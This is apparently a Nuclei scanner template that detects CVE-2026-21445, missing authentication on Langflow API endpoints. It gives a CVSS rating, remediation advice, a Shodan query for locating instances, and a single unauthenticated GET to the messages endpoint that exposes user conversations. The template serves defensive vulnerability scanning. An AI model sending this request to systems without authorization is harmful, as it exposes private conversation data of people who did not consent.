Langflow - Broken Access Control

id: CVE-2026-21445

info:
  name: Langflow - Broken Access Control
  author: DhiyaneshDk
  severity: critical
  description: |
    Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0.dev45, multiple critical API endpoints in Langflow are missing authentication controls. The issue allows any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization.
  remediation: Update to version 1.7.0.dev45 or later.
  impact: |
    Unauthenticated attackers can access sensitive user data and perform destructive actions, risking data loss and privacy breaches.
  reference:
    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx
    - https://nvd.nist.gov/vuln/detail/CVE-2026-21445
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-21445
    cwe-id: CWE-306
    epss-score: 0.11673
    epss-percentile: 0.93762
  metadata:
    verified: true
    max-request: 1
    vendor: langflow-ai
    product: langflow
    shodan-query: html:"Langflow"
  tags: cve,cve2026,langflow,auth-bypass,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/monitor/messages"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"text":'
          - '"timestamp":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022035e667dd1c1037c81deda09bd7355c3ba15e111314f19b61f3f23a5cc5e8eb2b022100d35e87b6feb53fe7a86b68d426a2ddad8323ae904e19c51765639ff4a79ff4cd:922c64590222798bb761d5b6d8e72950